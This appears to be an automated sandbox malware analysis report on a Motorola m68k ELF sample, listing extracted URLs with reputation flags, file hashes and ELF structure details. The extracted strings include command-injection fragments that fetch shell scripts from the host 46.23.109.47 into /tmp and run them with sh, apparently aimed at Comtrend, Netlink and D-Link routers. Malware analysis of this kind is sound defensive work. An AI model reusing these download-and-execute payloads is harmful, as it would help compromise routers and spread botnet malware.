    http://46.23.109.47/Cloud/Cloud.x86w9J4jyf7oYtrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114w9J4jyf7oYtrue
    • Avira URL Cloud: malware
    unknown
    http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VIw9J4jyf7oYtrue
    • Avira URL Cloud: malware
    unknown
    http://schemas.xmlsoap.org/soap/encoding/w9J4jyf7oYfalse
      high
      http://46.23.109.47/Cloud/Cloud.mpsl;chmodw9J4jyf7oYtrue
      • Avira URL Cloud: malware
      unknown
      http://46.23.109.47/Cloud/Cloud.mips;w9J4jyf7oYtrue
      • Avira URL Cloud: malware
      unknown
      http://purenetworks.com/HNAP1/w9J4jyf7oYfalse
      • URL Reputation: safe
      unknown
      http://0.0.0.0/Cloud/Cloud.x86w9J4jyf7oYfalse
      • Avira URL Cloud: safe
      unknown
      http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$w9J4jyf7oYtrue
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/envelope/w9J4jyf7oYfalse
        high
        No contacted IP infos
        No context
        No context
        No context
        No context
        No context
        No created / dropped files found
        File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
        Entropy (8bit):6.536123197703782
        TrID:
        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
        File name:w9J4jyf7oY
        File size:119516
        MD5:bb2f72c63c8c0427d31a757dfa190260
        SHA1:035b12d2be4f11e9ebe390aadab1205a599c6432
        SHA256:2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
        SHA512:af8b0ae4bdb1016c6b65adb1b697b334e3bb38f7a855501fed7cc5727d56f7df93eec6544255ffbee0530c766e1a495375a59bdc3c4e9e3b96043e3697861920
        SSDEEP:3072:Wf75AB1k77IgffdHma8pdPUoPSHLP+E8f:e75AB1k77IgffVma8pdPUzT+EI
        TLSH:DFC38ED5A8115F3CFADB9AB582334B0CA82192040FE30F57FA67EC977D73195AA06C46
        File Content Preview:.ELF.......................D...4...L.....4. ...(.......................l...l...... ........p...p...p.......t...... .dt.Q............................NV..a....da.....N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy...lN.X.........N^NuNV..N^NuN

        ELF header

        Class:ELF32
        Data:2's complement, big endian
        Version:1 (current)
        Machine:MC68000
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:UNIX - System V
        ABI Version:0
        Entry Point Address:0x80000144
        Flags:0x0
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:3
        Section Header Offset:119116
        Section Header Size:40
        Number of Section Headers:10
        Header String Table Index:9
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .initPROGBITS0x800000940x940x140x00x6AX002
        .textPROGBITS0x800000a80xa80x1a3ee0x00x6AX004
        .finiPROGBITS0x8001a4960x1a4960xe0x00x6AX002
        .rodataPROGBITS0x8001a4a40x1a4a40x29c80x00x2A002
        .ctorsPROGBITS0x8001ee700x1ce700x80x00x3WA004
        .dtorsPROGBITS0x8001ee780x1ce780x80x00x3WA004
        .dataPROGBITS0x8001ee840x1ce840x2880x00x3WA004
        .bssNOBITS0x8001f10c0x1d10c0x8d80x00x3WA004
        .shstrtabSTRTAB0x00x1d10c0x3e0x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x800000000x800000000x1ce6c0x1ce6c6.55520x5R E0x2000.init .text .fini .rodata
        LOAD0x1ce700x8001ee700x8001ee700x29c0xb743.00750x6RW 0x2000.ctors .dtors .data .bss
        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
        No network behavior found

        System Behavior